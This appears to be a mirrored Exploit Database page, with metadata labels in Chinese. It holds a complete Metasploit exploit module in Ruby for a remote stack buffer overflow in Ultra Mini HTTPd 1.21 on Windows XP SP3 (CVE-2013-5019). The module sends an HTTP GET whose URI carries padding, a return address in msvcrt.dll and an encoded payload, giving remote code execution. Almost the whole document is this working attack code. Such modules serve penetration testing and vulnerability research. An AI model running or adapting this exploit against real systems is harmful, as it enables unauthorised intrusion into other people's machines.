Ultra Mini HTTPd – Remote Stack Buffer Overflow (Metasploit)

• Exploit Database
• 14 阅读

• 作者： Metasploit
  日期： 2013-08-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/27608/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "Ultra Mini HTTPD Stack Buffer Overflow",
  'Description'=> %q{
  This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21
  allowing remote attackers to execute arbitrary code via a long resource name in an HTTP
  request.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'superkojiman',#Discovery, PoC
  'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
  ],
  'References' =>
  [
  ['OSVDB', '95164'],
  ['EDB','26739'],
  ['CVE','2013-5019'],
  ['BID','61130']
  ],
  'Payload'=>
  {
  'Space' => 1623,
  'StackAdjustment' => -3500,
  'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f"
  },
  'DefaultOptions'=>
  {
  'ExitFunction' => "thread"
  },
  'Platform' => 'win',
  'Targets'=>
  [
  [
  'v1.21 - Windows XP SP3',
  {
  'Offset' => 5412,
  'Ret'=>0x77c354b4 # push esp / ret - msvcrt.dll
  }
  ]
  ],
  'Privileged' => false,
  'DisclosureDate' => 'Jul 10 2013',
  'DefaultTarget'=> 0
  ))
  end
  
  def exploit
  buf = rand_text(target['Offset'])
  buf << [target.ret].pack("V*")
  buf << payload.encoded
  
  print_status("Sending buffer...")
  send_request_cgi({
  'method' => 'GET',
  'uri'=> "/#{buf}"
  })
  end
  end